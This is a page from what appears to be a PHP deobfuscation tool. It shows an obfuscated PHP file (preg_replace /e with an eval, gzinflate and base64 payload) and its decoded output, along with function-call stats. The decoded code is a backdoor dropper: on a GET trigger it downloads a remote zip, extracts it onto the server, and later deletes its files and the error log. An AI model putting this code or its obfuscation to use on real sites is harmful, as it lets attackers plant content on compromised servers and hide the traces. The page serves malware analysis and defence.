Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\..
Decoded Output download
?><?php
if ($_GET['check'] == 'start')
{
if (isset ($_GET['archive']))
{
$url = $_GET['archive'];
$put = $_SERVER['SCRIPT_FILENAME'];
$put = str_replace("router.php", "", "$put");
mkdir("$put/1", 0777);
copy($url, "$put/1/1.zip");
if (file_exists("$put/1/1.zip"))
{
set_time_limit(0);
$zip = new ZipArchive;
$zip->open("$put/1/1.zip");
$zip->extractTo('./1/');
$zip->close();
}
$url = str_replace("1.zip", "", "$url");
$f = fopen ("1/server_name.txt", "a");
fwrite($f, "$url");
fclose($f);
$domen = $_SERVER['SERVER_NAME'];
}
echo "Client \"$domen\" - has been activated!<br>";
}
if ($_GET['check'] == 'finish')
{
$dir = dirname(__FILE__)."/1/";
$arr_filename = array ();
if (is_dir($dir))
{
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (($file != ".") and ($file != ".."))
{
$arr_filename[] = $file;
}
}
closedir($dh);
}
}
foreach ($arr_filename as $key)
{
$key = trim($key);
if (file_exists("1/$key"))
unlink("1/$key");
}
if (file_exists("error_log"))
unlink("error_log");
if (is_dir('1'))
rmdir("1");
if (is_dir('1'))
echo "Error!";
else
echo "Client has been destroyed!";
}
?>
Did this file decode correctly?
Original Code
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'vVjJjpwwEL1Hyj+0WnNILiMwXkCj/MlcZoA+5Rz158e12cYYTDeTHKw2BqpeVb1a6Jf7eBuny+X11+X6fu9ufs1+jbR3zfvd9vSr/Gomvz782eCXpTPl7yv9fjf+ee38Mn4P15/+3F/bjmRYw3s+NxO93020UJY/d/4Z59+3rf9VtIdzNUT9jd+7z+U1rBwXXKO8jvSjrCOYWXfADnIsyQjYhzUmWSVsskCvMyx/jD5AXCcxdTW9DevWZb2mY71ej7HJXmIG9zs6016maRgjYLZ0pkd6T3seaY9ZT3R9FqPwAnwA+tAXhjk6kn8sxxnjq/iZW5Rn2e9qzrgNZxwL3OfXOS5Fsd+zxU7Edas5ViriWsmDvGuXejtYLq6qvo5tBblD5PiCa3s2CQb5BR9xrgcfVTBsYsvz0vLZSDGBeGJs0pzV9Fv1WQXvVo4ezdfFc0kdQQ5ybDHWYseYnA2Mtad4lv13ffv+7eU+TLOVOlzSjfan9iW5YWfG5ejaJM/pnbqxG8s93RP1CeEb1vb5fKxO42EOSZ2QmoDx0oQXMTrCkOJSB3LsEIaOOXCLfEGdB2W76bne8Ux93IxFrRamGA7EDt6R/A+ctQX+NBm2xIc4C9i4x1yb2S7OP7RFRw7k2G17DC9gg1xCG4fYO6Smoi0nfYL2b3FFdDxZb/F95rv4Rvz7VM8v3b893uNL3A5zYc/5yT7V4psh4peZwIzR7yU7w33OS8W9Hmeojq85P6JvqA7PptdSh9P6EepmG/kAulVL87LleQNqAPI388HK9v8wS4c+O8e+aqX+ZfzBHljgVPDxwDNMmsPJ+SoXe+ZXYTaUc+zP7K9FLS74L2CR7wKpAdksscKR4k3exf2Q+L2Uawe/LxBHPuflfuNZJP2Oqs0fJW6gzD6zK6ujZ7DU5iGoizJHiM8DvqR25fdDn5K8axnTFtZ+iRPzbMr6R0s6Qu3csenInLfy9449gif0AOHxELkmsVjE76isVN5OrT86vz6TO1B30toifSN/rzbX7M0063tUh01jTD4Pl/pljT+P9KLFWZ77Mq+k/JV6msb3ifqU9iWU8Un33Ebst+K9ejfNO5mJB9Id8Ga6tvz1Fd9wob7neg/w3InvZCaYScZR2SW7duP9BfaGuVX+hxBOMIetq9tes/sRHQsfnOltjv3tKtgV8zx/X+K1E5t/gWdz1iz4UDG+Ijaz7DsP6dqZa+szKttult97iFnk6W3sKd/pv97r2/zn4/ePF/ob+PXC/0PABgdh2EAl/vn2Fw=='\x29\x29\x29\x3B","");
?>
Function Calls
gzinflate | 1 |
preg_replace | 1 |
base64_decode | 1 |
Stats
MD5 | fe6de33dce4fa5e35fc911e2dc833bf5 |
Eval Count | 3 |
Decode Time | 112 ms |